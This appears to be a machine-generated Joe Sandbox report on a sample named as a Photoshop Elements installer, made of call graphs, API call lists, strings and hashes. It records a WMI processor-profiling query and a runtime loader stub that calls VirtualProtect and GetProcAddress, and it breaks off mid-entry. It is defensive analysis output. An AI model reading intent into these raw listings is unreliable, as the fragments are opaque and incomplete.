19998->20002 19999->20003 20004 53718b 20000->20004 20005 53716c 20000->20005 20006 536ad3 71 API calls 20001->20006 20002->20003 20003->19946 20008 536cc3 71 API calls 20004->20008 20007 536e4c 71 API calls 20005->20007 20006->20003 20007->20003 20008->20003 20010 510a59 std::_Facet_Register 16 API calls 20009->20010 20011 20e4b4 20010->20011 20012 20a3f0 23 API calls 20011->20012 20013 20e4cf 20012->20013 20014 20a3f0 23 API calls 20013->20014 20015 20e4df 20014->20015 20015->19125 20015->19126 20530 2e5f40 20532 2e5f4f 20530->20532 20531 510a59 std::_Facet_Register 16 API calls 20534 2e5f74 20531->20534 20532->20531 20532->20534 20533 2e5fed 20534->20533 20535 2e5ff4 20534->20535 20537 52d043 16 API calls 20534->20537 20538 2e5ff9 20534->20538 20536 209490 Concurrency::cancel_current_task KiUserExceptionDispatcher 20535->20536 20536->20538 20537->20534 20539 5008bf Concurrency::cancel_current_task KiUserExceptionDispatcher 20538->20539 20540 2e5ffe 20539->20540 20541 2e6054 20540->20541 20542 2e6034 20540->20542 20544 510a46 _ValidateLocalCookies IsProcessorFeaturePresent 20541->20544 20543 510a46 _ValidateLocalCookies IsProcessorFeaturePresent 20542->20543 20545 2e6050 20543->20545 20546 2e6063 20544->20546 20547 3ecfd0 20557 3ed025 20547->20557 20558 3ed2c9 20547->20558 20548 510a46 _ValidateLocalCookies IsProcessorFeaturePresent 20549 3ed3c1 20548->20549 20550 20b1c0 23 API calls 20550->20557 20551 3ecdd0 30 API calls 20551->20557 20552 20a8b0 23 API calls 20552->20557 20553 20b300 23 API calls 20553->20557 20556 20a680 7 API calls 20556->20557 20557->20550 20557->20551 20557->20552 20557->20553 20557->20556 20557->20558 20559 20ad10 7 API calls 20557->20559 20560 3eec40 RtlEnterCriticalSection 20557->20560 20569 3c6900 MultiByteToWideChar 20557->20569 20558->20548 20559->20557 20561 3eec5b 20560->20561 20562 3eec64 20560->20562 20591 3fe880 20561->20591 20564 3eec8a 20562->20564 20565 510a59 std::_Facet_Register 16 API calls 20562->20565 20566 20a3f0 23 API calls 20564->20566 20565->20564 20567 3eecb6 RtlLeaveCriticalSection 20566->20567 20568 3eecca 20567->20568 20568->20557 20570 521a8c __Getctype 15 API calls 20569->20570 20571 3c693b 20570->20571 20572 3c69bc MultiByteToWideChar 20571->20572 20577 3c6944 20571->20577 20573 3c69d6 20572->20573 20574 3c6a96 20572->20574 20575 3c69dd GetLastError 20573->20575 20576 3c69fa 20573->20576 20574->20574 20580 20a8b0 23 API calls 20574->20580 20581 3c6a74 20575->20581 20578 3c6a4a 20576->20578 20579 3c6a03 GetLastError 20576->20579 20577->20557 20578->20581 20582 3c6a54 GetLastError 20578->20582 20583 3c6a33 20579->20583 20584 3c6aba 20580->20584 20585 521898 __freea 14 API calls 20581->20585 20582->20581 20589 521898 __freea 14 API calls 20583->20589 20586 521898 __freea 14 API calls 20584->20586 20587 3c6a8a 20585->20587 20588 3c6ac0 20586->20588 20587->20557 20588->20557 20590 3c6a3e 20589->20590 20590->20557 20592 3fe8a0 20591->20592 20593 3fe8c1 20592->20593 20594 3fea12 20592->20594 20595 3fea1c 20593->20595 20598 3fe8dc 20593->20598 20599 3fe903 20593->20599 20596 20ea20 23 API calls 20594->20596 20597 209490 Concurrency::cancel_current_task KiUserExceptionDispatcher 20595->20597 20608 3fe8ed std::locale::_Locimp::_Locimp std::locale::_Setgloballocale 20596->20608 20600 3fea21 20597->20600 20598->20595 20602 510a59 std::_Facet_Register 16 API calls 20598->20602 20603 510a59 std::_Facet_Register 16 API calls 20599->20603 20599->20608 20604 3fea6c 20600->20604 20605 3fea85 20600->20605 20601 5215e8 7 API calls 20601->20595 20602->20608 20603->20608 20606 510a46 _ValidateLocalCookies IsProcessorFeaturePresent 20604->20606 20609 510a46 _ValidateLocalCookies IsProcessorFeaturePresent 20605->20609 20607 3fea81 20606->20607 20607->20562 20608->20601 20611 3fe9f7 std::ios_base::_Ios_base_dtor 20608->20611 20610 3feaac 20609->20610 20610->20562 20611->20562

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 0 3d24b0-3d2506 CoInitializeEx 1 3d250c-3d252d CoCreateInstance 0->1 2 3d2a17-3d2a36 call 510a46 0->2 3 3d2a0b-3d2a0f 1->3 4 3d2533-3d2552 call 2e8eb0 1->4 3->2 7 3d2a11 CoUninitialize 3->7 10 3d2558 4->10 11 3d2554-3d2556 4->11 7->2 12 3d255a-3d2591 call 2e8f70 10->12 11->12 17 3d29f4-3d29f9 12->17 18 3d2597-3d25b0 CoSetProxyBlanket 12->18 17->3 21 3d29fb-3d2a09 17->21 19 3d29dd-3d29e2 18->19 20 3d25b6-3d25e8 call 2e8e10 * 2 18->20 19->17 22 3d29e4-3d29f2 19->22 29 3d25ee 20->29 30 3d25ea-3d25ec 20->30 21->3 22->17 31 3d25f0-3d25f4 29->31 30->31 32 3d25fa 31->32 33 3d25f6-3d25f8 31->33 34 3d25fc-3d2634 call 2e8f70 * 2 32->34 33->34 34->19 41 3d263a-3d264d 34->41 41->19 42 3d2653-3d2673 41->42 45 3d2679-3d26c6 call 510a59 call 2e8e10 42->45 46 3d29c6-3d29cb 42->46 53 3d26cc 45->53 54 3d26c8-3d26ca 45->54 46->19 47 3d29cd-3d29db 46->47 47->19 55 3d26ce-3d26fc call 2e8f70 53->55 54->55 60 3d27ac-3d27cb VariantClear call 2e8e10 55->60 61 3d2702-3d2707 55->61 66 3d27cd-3d27cf 60->66 67 3d27d1 60->67 61->60 63 3d270d-3d2783 call 548d80 call 3c6bc0 call 20b1c0 call 22a250 61->63 79 3d2798-3d27a7 call 20a680 * 2 63->79 80 3d2785-3d2793 call 20a8b0 63->80 69 3d27d3-3d2801 call 2e8f70 66->69 67->69 83 3d2877-3d2896 VariantClear call 2e8e10 69->83 84 3d2803-3d2808 69->84 79->60 80->79 92 3d289c 83->92 93 3d2898-3d289a 83->93 84->83 87 3d280a-3d2815 SysStringLen 84->87 87->83 90 3d2817-3d2850 call 20b1c0 call 22a250 87->90 100 3d2853-3d285c 90->100 95 3d289e-3d28cc call 2e8f70 92->95 93->95 108 3d2966-3d2978 VariantClear 95->108 109 3d28d2-3d28d7 95->109 100->100 102 3d285e-3d2872 call 20a8b0 call 20a680 100->102 102->83 111 3d297a-3d2983 108->111 112 3d29a4-3d29c3 call 20df00 call 510a89 108->112 109->108 110 3d28dd-3d2926 call 20b1c0 call 3cb9f0 call 22a250 109->110 129 3d2928-3d294f call 20a680 110->129 130 3d2952-3d2961 call 20a680 * 2 110->130 111->112 113 3d2985-3d299f call 279180 call 221ff0 111->113 112->46 127 3d29a1 113->127 127->112 129->130 130->108
                                                                                                        APIs
                                                                                                        • CoInitializeEx.COMBASE(00000000,00000000), ref: 003D24F8
                                                                                                        • CoCreateInstance.COMBASE(005A7B4C,00000000,00000001,005A7B5C,?), ref: 003D2525
                                                                                                        • CoUninitialize.COMBASE ref: 003D2A11
                                                                                                          • Part of subcall function 002E8EB0: SysAllocString.OLEAUT32(?), ref: 002E8F10
                                                                                                        • CoSetProxyBlanket.COMBASE(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 003D25A8
                                                                                                        • VariantClear.OLEAUT32(?), ref: 003D27B0
                                                                                                        • SysStringLen.OLEAUT32(?), ref: 003D280D
                                                                                                        • VariantClear.OLEAUT32(?), ref: 003D287B
                                                                                                        • VariantClear.OLEAUT32(?), ref: 003D296A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.3743373365.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754163043.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754233374.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ClearVariant$String$AllocBlanketCreateInitializeInstanceProxyUninitialize
                                                                                                        • String ID: MaxClockSpeed$Name$NumberOfCores$ROOT\CIMV2$SELECT * FROM Win32_Processor$WQL$frequencyInGHz$name$numberOfCores
                                                                                                        • API String ID: 1142649345-4059056153
                                                                                                        • Opcode ID: 730fc948d8a3e2c5b710afe054dbd86887dfe78572a0d7258c45d24a88a52868
                                                                                                        • Instruction ID: 8f54ad0fc01e15022018ac158e604f7f6f77000e4507f56058037a16ccbf9fa3
                                                                                                        • Opcode Fuzzy Hash: 730fc948d8a3e2c5b710afe054dbd86887dfe78572a0d7258c45d24a88a52868
                                                                                                        • Instruction Fuzzy Hash: 2A029871E10318AFEB15DFA4DC55BAEBBB8BF58700F144159E805BB2D1DBB46A04CBA0

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 272 b49970-b4997d 273 b4998a-b4998f 272->273 274 b49991 273->274 275 b49980-b49985 274->275 276 b49993 274->276 277 b49986-b49988 275->277 278 b49998-b4999a 276->278 277->273 277->274 279 b499a3-b499a7 278->279 280 b4999c-b499a1 278->280 281 b499b4-b499b7 279->281 282 b499a9 279->282 280->279 283 b499c0-b499c2 281->283 284 b499b9-b499be 281->284 285 b499d3-b499d8 282->285 286 b499ab-b499b2 282->286 283->278 284->283 287 b499da-b499e3 285->287 288 b499eb-b499ed 285->288 286->281 286->285 289 b499e5-b499e9 287->289 290 b49a5a-b49a5d 287->290 291 b499f6 288->291 292 b499ef-b499f4 288->292 289->291 293 b49a62-b49a65 290->293 294 b499c4-b499c6 291->294 295 b499f8-b499fb 291->295 292->291 298 b49a67-b49a69 293->298 296 b499cf-b499d1 294->296 297 b499c8-b499cd 294->297 299 b49a04 295->299 300 b499fd-b49a02 295->300 301 b49a25-b49a34 296->301 297->296 298->293 302 b49a6b-b49a6e 298->302 299->294 303 b49a06-b49a08 299->303 300->299 306 b49a44-b49a51 301->306 307 b49a36-b49a3d 301->307 302->293 308 b49a70-b49a8c 302->308 304 b49a11-b49a15 303->304 305 b49a0a-b49a0f 303->305 304->303 309 b49a17 304->309 305->304 306->306 311 b49a53-b49a55 306->311 307->307 310 b49a3f 307->310 308->298 312 b49a8e 308->312 314 b49a22 309->314 315 b49a19-b49a20 309->315 310->277 311->277 313 b49a94-b49a98 312->313 316 b49adf-b49ae2 313->316 317 b49a9a-b49ab0 LoadLibraryA 313->317 314->301 315->303 315->314 319 b49ae5-b49aec 316->319 318 b49ab1-b49ab6 317->318 318->313 320 b49ab8-b49aba 318->320 321 b49b10-b49b40 VirtualProtect * 2 319->321 322 b49aee-b49af0 319->322 323 b49ac3-b49ad0 GetProcAddress 320->323 324 b49abc-b49ac2 320->324 327 b49b44-b49b48 321->327 325 b49af2-b49b01 322->325 326 b49b03-b49b0e 322->326 328 b49ad2-b49ad7 323->328 329 b49ad9 ExitProcess 323->329 324->323 325->319 326->325 327->327 330 b49b4a 327->330 328->318
                                                                                                        APIs
                                                                                                        • LoadLibraryA.KERNEL32(?), ref: 00B49AAA
                                                                                                        • GetProcAddress.KERNEL32(?,00B28FF9), ref: 00B49AC8
                                                                                                        • ExitProcess.KERNEL32(?,00B28FF9), ref: 00B49AD9
                                                                                                        • VirtualProtect.KERNEL32(001D0000,00001000,00000004,?,00000000), ref: 00B49B27
                                                                                                        • VirtualProtect.KERNEL32(001D0000,00001000), ref: 00B49B3C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3754163043.0000000000B49000.00000080.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.3743373365.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754233374.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 1996367037-0
                                                                                                        • Opcode ID: f10d0b478d52d979cc20c418619e84ee81e00264883e8550ad284b0270b14506
                                                                                                        • Instruction ID: 89250c07630bfa5e9e3b7a4dcc726c8e324343f1deb4bc8483f0ced4be3c4b26
                                                                                                        • Opcode Fuzzy Hash: f10d0b478d52d979cc20c418619e84ee81e00264883e8550ad284b0270b14506
                                                                                                        • Instruction Fuzzy Hash: CD513872A557525BD7208EB8DCC0672B7D4EB4132472807BCC5E2CB3C6F7A45E05A760

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 136 401f10-401f40 CoInitialize 137 401f46 136->137 138 401f49-401f4c 137->138 139 401f67-401f80 RtlEnterCriticalSection RtlLeaveCriticalSection 138->139 140 401f4e-401f61 RtlEnterCriticalSection RtlLeaveCriticalSection 138->140 142 401fc2-401fdb RtlEnterCriticalSection RtlLeaveCriticalSection 139->142 143 401f82-401f97 call 3f0dd0 139->143 140->139 141 4022cd-4022d8 140->141 144 4022f2-402315 CoUninitialize call 510a46 141->144 145 4022da-4022ef 141->145 142->137 146 401fe1-401fe8 142->146 143->138 156 401f99-401fa1 143->156 145->144 148 4021bb-4021e9 call 402380 RtlEnterCriticalSection RtlLeaveCriticalSection 146->148 149 401fee-402063 call 402380 call 402440 RtlEnterCriticalSection 146->149 160 402299-40229b 148->160 161 4021ef-4021f1 148->161 171 402129-40213c RtlLeaveCriticalSection 149->171 172 402069-40206e 149->172 156->138 159 401fa3-401fc0 156->159 159->137 160->137 167 4022a1-4022ab 160->167 164 4021f3-4021fd 161->164 165 40221a-402270 call 402440 call 2dadf0 161->165 169 402201-402215 164->169 170 4021ff 164->170 201 402274-402294 call 3f9300 call 234910 165->201 173 4022ad 167->173 174 4022af-4022c8 167->174 191 402217 169->191 170->169 178 402162-40217f call 2dadf0 171->178 179 40213e-40215b 171->179 177 402071-402073 172->177 173->174 174->137 177->171 183 402079-4020aa 177->183 202 402183-40218b 178->202 179->178 187 4020b0-4020b3 183->187 188 4020ac-4020ae 183->188 192 4020b4-4020be 187->192 188->192 191->165 197 4020c4-4020dc 192->197 198 402318-402329 call 5008dc 192->198 213 402108-402116 call 286360 197->213 214 4020de-4020e1 197->214 207 40232b-40234d 198->207 208 40234e-402350 198->208 201->137 205 4021a7-4021b6 call 234910 202->205 206 40218d 202->206 205->137 211 402190-4021a5 call 3f9300 206->211 207->208 211->205 225 40211b-402123 213->225 219 4020f3-402106 call 402440 214->219 220 4020e3-4020f1 214->220 219->225 220->225 225->171 225->177
                                                                                                        APIs
                                                                                                        • CoInitialize.OLE32(00000000), ref: 00401F40
                                                                                                        • RtlEnterCriticalSection.NTDLL(00000000), ref: 00401F4F
                                                                                                        • RtlLeaveCriticalSection.NTDLL(00000000), ref: 00401F59
                                                                                                        • RtlEnterCriticalSection.NTDLL(?), ref: 00401F6B
                                                                                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 00401F78
                                                                                                        • RtlEnterCriticalSection.NTDLL(?), ref: 00401FC6
                                                                                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 00401FD3
                                                                                                        • RtlEnterCriticalSection.NTDLL(?), ref: 00402055
                                                                                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 0040212D
                                                                                                        • RtlEnterCriticalSection.NTDLL(00000018), ref: 004021D5
                                                                                                        • RtlLeaveCriticalSection.NTDLL(00000018), ref: 004021DC
                                                                                                        • CoUninitialize.COMBASE ref: 004022F2
                                                                                                        Strings
                                                                                                        • Event with guid '%s' is being sent, xrefs: 00402204
                                                                                                        • failure in WaitforEvent, xrefs: 00401FA5
                                                                                                        • Async thread is completed. Now exiting from function., xrefs: 004022DC
                                                                                                        • Event with guid '%s' has been discarded. So it won't be sent, xrefs: 004022B2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.3743373365.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754163043.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754233374.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalSection$EnterLeave$InitializeUninitialize
                                                                                                        • String ID: Async thread is completed. Now exiting from function.$Event with guid '%s' has been discarded. So it won't be sent$Event with guid '%s' is being sent$failure in WaitforEvent
                                                                                                        • API String ID: 779438731-1722267760
                                                                                                        • Opcode ID: 69400de7071755d85b7fdd1d1747e27c28fc742ed30e8d7c443399c2246a4318
                                                                                                        • Instruction ID: 2218a02d30b0771211e5d3a562f5d55a840a306aaba838baff815acf4356f252
                                                                                                        • Opcode Fuzzy Hash: 69400de7071755d85b7fdd1d1747e27c28fc742ed30e8d7c443399c2246a4318
                                                                                                        • Instruction Fuzzy Hash: B0D19B71A00219DFCF04DF98D989AAEBBB5FF49314F14416AE801BB391DB74AD45CBA0

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 228 3ecdd0-3ece17 229 3ece7e 228->229 230 3ece19-3ece1c 228->230 231 3ece80-3ece9b call 510a46 229->231 232 3ece20-3ece24 230->232 232->229 234 3ece26-3ece49 ReadFile GetLastError 232->234 236 3ece4b-3ece4d 234->236 237 3ece51-3ece55 234->237 239 3ece5b-3ece5d 236->239 240 3ece4f 236->240 238 3ecf1c-3ecf24 237->238 237->239 243 3ecf26-3ecf52 238->243 244 3ecf54-3ecf5c 238->244 239->229 242 3ece5f-3ece67 239->242 241 3ece6a-3ece7c Sleep 240->241 241->229 241->232 245 3ece9c-3ecea4 242->245 246 3ece69 242->246 248 3ecf86-3ecf93 call 20a3a0 243->248 247 3ecf5e-3ecf83 244->247 244->248 250 3ecea6-3eced2 245->250 251 3eced4-3ecedc 245->251 246->241 247->248 258 3ecf9a-3ecfbd call 3eeb80 call 20a680 call 3eea70 248->258 254 3ecf06-3ecf1a call 20a3a0 250->254 253 3ecede-3ecf03 251->253 251->254 253->254 254->258 258->231
                                                                                                        APIs
                                                                                                        • ReadFile.KERNEL32(005853B5,00000000,003ED0B5,00000000,00000000,9F8BC7FC,00000000,?,?,?,?,?,?,?,?,00000000), ref: 003ECE34
                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,005853B5), ref: 003ECE3D
                                                                                                        • Sleep.KERNEL32(0000000A), ref: 003ECE6C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.3743373365.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754163043.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754233374.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorFileLastReadSleep
                                                                                                        • String ID: Aborting read on pipe %p , errno: %lu$CommBridge$Number of retries to read pipe exhausted with last errno = %lu. Aborting read on pipe %p$OOBEUtils$Terminate channel
                                                                                                        • API String ID: 1807766164-3019080840
                                                                                                        • Opcode ID: 133cf1dddd85548bbfa4a1854ef948b1c103674ad63320e6494acaf7a87d7feb
                                                                                                        • Instruction ID: 0971ae49c46fb0c0cfc0776bed335c5ff211ad119f64433def5ff7a50e4f1a1c
                                                                                                        • Opcode Fuzzy Hash: 133cf1dddd85548bbfa4a1854ef948b1c103674ad63320e6494acaf7a87d7feb
                                                                                                        • Instruction Fuzzy Hash: F051E871A11228AFCF18ABA5CC46BAEBBB6BF44B10F01421DF802B72C1CB705D01CB91

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 331 52e510-52e51d call 53656a 334 52e51f-52e527 331->334 335 52e55d-52e58a RtlExitUserThread call 538548 call 535d79 331->335 334->335 336 52e529-52e52d 334->336 349 52e5a9-52e5b6 call 52e4d9 335->349 350 52e58c-52e5a7 GetModuleHandleExW 335->350 338 52e534-52e53a 336->338 339 52e52f call 53821a 336->339 342 52e547-52e54d 338->342 343 52e53c-52e53e 338->343 339->338 342->335 346 52e54f-52e551 342->346 343->342 345 52e540-52e541 CloseHandle 343->345 345->342 346->335 348 52e553-52e557 FreeLibraryAndExitThread 346->348 348->335 350->349
                                                                                                        APIs
                                                                                                          • Part of subcall function 0053656A: GetLastError.KERNEL32(00000000,00000000,?,0052157F,00000000,?,005215F7,00000000,00000000,00000000,00000000,00000000,00000018,0027417B,?,004024A0), ref: 0053656F
                                                                                                          • Part of subcall function 0053656A: SetLastError.KERNEL32(00000000,00000002,000000FF,?,005215F7,00000000,00000000,00000000,00000000,00000000,00000018,0027417B,?,004024A0,00000018,00000000), ref: 0053660D
                                                                                                        • CloseHandle.KERNEL32(?,?,?,0052E647,?,?,0052E4B9,00000000), ref: 0052E541
                                                                                                        • FreeLibraryAndExitThread.KERNEL32(?,?,?,?,0052E647,?,?,0052E4B9,00000000), ref: 0052E557
                                                                                                        • RtlExitUserThread.NTDLL(?,?,?,0052E647,?,?,0052E4B9,00000000), ref: 0052E560
                                                                                                        • _free.LIBCMT ref: 0052E580
                                                                                                        • GetModuleHandleExW.KERNEL32(00000004,?,0000000C), ref: 0052E59E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.3743373365.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754163043.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3754233374.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorExitHandleLastThread$CloseFreeLibraryModuleUser_free
                                                                                                        • String ID:
                                                                                                        • API String ID: 3837758467-0
                                                                                                        • Opcode ID: 19d0666058b66ee36e3fabbdbeb7e53d4b34b817962e5f7028f02e211504d126
                                                                                                        • Instruction ID: 426a36206e4ca2941bfffcfad3867b871760535e0265a0a663f1f4dce60ebc2a
                                                                                                        • Opcode Fuzzy Hash: 19d0666058b66ee36e3fabbdbeb7e53d4b34b817962e5f7028f02e211504d126
                                                                                                        • Instruction Fuzzy Hash: 0711AC72600224ABCB249B69EC0AA5F7FA9FF83724F148519F925D7290EB70DE01C690

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 434 53c29d-53c2b6 435 53c2b8-53c2c8 call 533173 434->435 436 53c2cc-53c2d1 434->436 435->436 443 53c2ca 435->443 437 53c2d3-53c2db 436->437 438 53c2de-53c306 call 53794e 436->438 437->438 444 53c464-53c475 call 510a46 438->444 445 53c30c-53c318 438->445 443->436 446 53c31a-53c31f 445->446 447 53c34f 445->447 450 53c321-53c32a call 511960 446->450 451 53c334-53c33f call 535db3 446->451 449 53c351-53c353 447->449 453 53c459 449->453 454 53c359-53c36c call 53794e 449->454 463 53c34a-53c34d 450->463 464 53c32c-53c332 450->464 451->463 465 53c341 451->465 458 53c45b-53c462 call 50426e 453->458 454->453 466 53c372-53c384 call 538151 454->466 458->444 463->449 468 53c347 464->468 465->468 470 53c389-53c38d 466->470 468->463 470->453 471 53c393-53c39b 470->471 472 53c3d5-53c3e1 471->472 473 53c39d-53c3a2 471->473 474 53c3e3-53c3e5 472->474 475 53c412 472->475 473->458 476 53c3a8-53c3aa 473->476 477 53c3e7-53c3f0 call 511960 474->477 478 53c3fa-53c405 call 535db3 474->478 479 53c414-53c416 475->479 476->453 480 53c3b0-53c3ca call 538151 476->480 483 53c452-53c458 call 50426e 477->483 491 53c3f2-53c3f8 477->491 478->483 493 53c407 478->493 479->483 484 53c418-53c431 call 538151 479->484 480->458 495 53c3d0 480->495 483->453 484->483 497 53c433-53c43a 484->497 496 53c40d-53c410 491->496 493->496 495->453 496->479 498 53c476-53c47c 497->498 499 53c43c-53c43d 497->499 500 53c43e-53c450 call 53c72c 498->500 499->500 500->483 503 53c47e-53c485 call 50426e 500->503 503->458
                                                                                                        APIs
                                                                                                        • __freea.LIBCMT ref: 0053C453
                                                                                                          • Part of subcall function 00535DB3: RtlAllocateHeap.NTDLL(00000000,00000018,00000018), ref: 00535DE5
                                                                                                        • __freea.LIBCMT ref: 0053C45C
                                                                                                        • __freea.LIBCMT ref: 0053C47F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.3743373365.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.3743552926.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
